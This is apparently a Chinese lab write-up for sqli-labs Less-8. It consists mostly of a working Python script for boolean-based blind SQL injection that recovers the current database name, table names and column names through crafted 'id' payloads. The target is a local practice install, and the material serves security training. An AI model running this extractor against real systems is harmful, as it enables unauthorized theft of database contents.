sqli-labs第8关
布尔盲注 python代码:
参考了这篇博客:
跳转博客
笔者对其提供的代码进行了代码重写和优化,如下:
# the burp_schema.py is for 布尔盲注的爆破
import requests
# Target URL of the lab's Less-8 page (a local sqli-labs install); replace
# with the real one before running.
url = "http://localhost/sqli-labs-master/Less-8"
# Candidate characters for one position of the extracted name: printable
# ASCII 33-126 with the uppercase block 65-90 left out.  The original author
# omits uppercase so that a case-insensitive ``= 'c'`` comparison cannot
# report both cases for the same position.
keylist = [chr(code) for code in range(33, 127) if not 65 <= code <= 90]
# Substring present in the response body only when the injected condition
# is true; replace if the target prints a different marker.
flag = 'You are in'
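class Base:
    """Boolean-based blind extraction of one value through a page oracle.

    Each probe is sent as the ``id`` query parameter of the module-level
    ``url``; a response whose body contains the module-level ``flag`` string
    counts as "condition true".  Only point this at a target you are
    authorized to test (the defaults are a local sqli-labs instance).

    Args:
        min: lower bound of the binary search for the value's length.
        max: upper bound of the binary search; the true length must not
            exceed ``max + 1`` or ``get_length`` underestimates it.
        payload1: prefix ending in ``>`` for the length probe; the probed
            number and ``-- ss`` are appended.
        payload2: prefix ending in ``,`` for the character probe;
            ``<pos>,1 )= '<c>'-- ss`` is appended.
        len: initial length, overwritten by ``get_length``.
    """

    # Seconds to wait for one HTTP round-trip; a hung target should fail the
    # run instead of blocking it forever (the original call had no timeout).
    REQUEST_TIMEOUT = 10

    def __init__(self, min, max, payload1, payload2, len=0):
        self.min = min
        self.max = max
        self.payload1 = payload1
        self.payload2 = payload2  # prefix used by get_name
        self.len = len  # length of the value being extracted

    def _probe(self, payload):
        """Send ``payload`` as the ``id`` parameter; True when ``flag`` appears."""
        response = requests.get(
            url, params={"id": payload}, timeout=self.REQUEST_TIMEOUT
        )
        return flag in response.text

    def get_length(self):
        """Binary-search the value's length with ``length(...) > mid`` probes.

        Stores the result in ``self.len`` and returns it.  Invariant: the
        value is at least ``lo`` long and at most ``hi + 1`` long; when the
        bounds cross, ``lo`` is the length.  (The original took the last
        probed midpoint plus one, which is one too large whenever the final
        probe answered false, e.g. for a 6-character name with max=10.)
        """
        lo = self.min
        hi = self.max
        while lo <= hi:
            mid = (lo + hi) // 2
            # True means the value is strictly longer than mid.
            if self._probe(self.payload1 + str(mid) + "-- ss"):
                lo = mid + 1
            else:
                hi = mid - 1
        print("len: " + str(lo), end='\n')
        self.len = lo
        return lo

    def get_name(self):
        """Recover the value one character at a time and return it.

        Every position is compared against the entries of the module-level
        ``keylist``; the first match is taken and the scan of that position
        stops (the original kept probing the remaining candidates).  A
        position matching nothing is recorded as ``?`` so later characters
        keep their offsets.  ``self.len`` must already be set, normally by
        ``get_length``.
        """
        name = ''
        for pos in range(1, self.len + 1):
            for c in keylist:
                if self._probe(self.payload2 + str(pos) + ",1 )= '" + c + "'-- ss"):
                    name += c
                    break
            else:
                name += '?'
            print("name: " + str(name), end='\n')
        return name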
def GetCurrentDatabase():
    """Print the length and then the name of the current database (``database()``)."""
    extractor = Base(
        0,
        10,
        "1' and (length(database()))>",
        "1' and substring(database(),",
    )
    extractor.get_length()
    extractor.get_name()
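def GetTables():
    """Print the comma-joined names of every table in the current database.

    The subquery is built once and shared by the length and character
    payloads.  The original bound ``get_length``'s result to an unused name
    that shadowed the builtin ``len``; the length lives in ``tables.len``.
    """
    subquery = (
        "(select group_concat(table_name) from information_schema.tables "
        "where table_schema = database())"
    )
    tables = Base(
        0,
        100,
        "1' and (length(" + subquery + "))>",
        "1' and substr(" + subquery + ",",
    )
    tables.get_length()
    tables.get_name()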
def GetColumns(table):
    """Print the comma-joined column names of ``table`` in the current database.

    ``table`` is spliced into the injected subquery as a single-quoted
    literal, so pass it as a plain string (e.g. ``'users'``).
    """
    subquery = (
        "(select group_concat(column_name) from information_schema.columns "
        "where table_name = '" + table + "' and table_schema=database())"
    )
    length_prefix = "1' and (length(" + subquery + "))>"
    char_prefix = "1' and substr(" + subquery + ","
    columns = Base(0, 100, length_prefix, char_prefix)
    columns.get_length()
    columns.get_name()
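# Run the enumeration only when executed as a script, so importing the module
# (e.g. to reuse Base) does not fire requests at the target.
if __name__ == "__main__":
    GetCurrentDatabase()
    GetTables()
    # Once the table names are known, uncomment and pass one of them as a
    # string, e.g. GetColumns('users'), to enumerate its columns.
    # GetColumns('users')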
重写后代码仅75行,长度探测和逐字符爆破的逻辑由 Base 类统一实现,三个查询函数复用同一套代码,复用率提高。
使用方法:
python burp_schema.py
得到结果如图:
得到表名字后,取消 python 程序最后一行 #GetColumns() 的注释,并把要查询的表名以字符串(带引号)的形式填入 GetColumns()。例子:
修改为:
GetColumns('users')
运行之后结果如下: